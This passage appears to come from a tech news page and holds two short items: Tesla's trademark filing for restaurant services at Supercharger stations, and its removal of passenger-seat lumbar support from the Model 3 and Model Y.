According to Electrek, which first spotted the filing, the sought-after restaurant-related trademarks include one for the word “Tesla,” another for its “T” logo, and another for the company’s own specific design of the word “Tesla.”

OK, perhaps it’s not such a great surprise that Musk appears to be looking toward the restaurant industry for his next ambitious project. Or at least, his next project.

After all, three years ago, the billionaire entrepreneur tweeted about his desire to include an eatery of sorts at Tesla Supercharger stations in Los Angeles.

“Gonna put an old school drive-in, roller skates & rock restaurant at one of the new Tesla Supercharger locations in LA,” Musk said in the tweet.


He hasn’t followed up on these ideas yet, but the recent filing with the USPTO certainly suggests that the electric car company is moving toward including Tesla-branded restaurants at some of its Supercharger stations.

Such facilities may already sell drinks in a cafe setting and include a lounge with vending machines where you can relax while you wait for your vehicle to charge, but for now, you have to explore nearby amenities if you’re after a proper dining experience.

While there’s been no official word from Tesla on its apparent desire to move into the restaurant business, the recent filing suggests the company has put the plan on the menu and so could launch such a facility in the near future. Musk Mega Burger, anyone?



Tesla ditches feature many owners didn’t even know they had

Tesla boss Elon Musk said this week that the automaker ditched the lumbar support feature on the front passenger seat of the Model 3 and Model Y because vehicle logs revealed that it was hardly used.

“Logs showed almost no usage,” Musk tweeted in response to a follower who was complaining about Tesla’s recent price hikes, adding, “Not worth cost/mass for everyone when almost never used.”

However, even the briefest of online searches uncovers plenty of comments indicating that the feature, which is designed to improve comfort via subtle seat adjustments, was rarely used because few people knew about it.

The person behind the Drive Tesla Twitter account, for example, admitted last year that it took a while to realize what the button on the side of the seat was actually for.

I’m not ashamed to admit I only discovered this week that this is the lumbar support. What feature did you only discover weeks or months after owning your #Tesla? pic.twitter.com/pA0aZKiW8g

— Drive Tesla (@DriveTeslaca) February 27, 2020

In a Tesla forum, another driver wrote: “LOL I have had my TM3 almost 5 months and until I found this thread I didn’t know I had lumbar adjustments.”

On a separate Tesla-focused site, an owner said simply: “We have lumbar buttons?!?”

Some posts about the feature suggest people may have stopped using it after finding that it provided little improvement to comfort. Other drivers, meanwhile, complained that it was hard to operate, with one poster saying they found the controls “finicky,” adding that they “don’t always seem to be working.”

Offering a succinct summary of the situation, a commenter on a YouTube video about the feature’s removal wrote: “Amazing how many people are losing their sh*t over something that they’ve got to go out to their car to see if they even have it or not!”

Responding to Musk’s tweet about the removal of lumbar support from the Model 3 and Model Y vehicles, some Tesla owners had an alternative suggestion about why it’s hardly used, explaining that once you’ve set it to your liking, there’s rarely a need to adjust it — though it’s worth noting that the driver’s seat is keeping the feature.

Of course, features in the passenger seat will always be used less than those on the driver’s side because the seat is occupied less frequently, though it’s not clear if Tesla took this into consideration. Whatever the truth about precisely why passengers skipped using lumbar support, Tesla has decided to remove it anyway, leaving riders to use the regular seat buttons to adjust the seat to their liking.
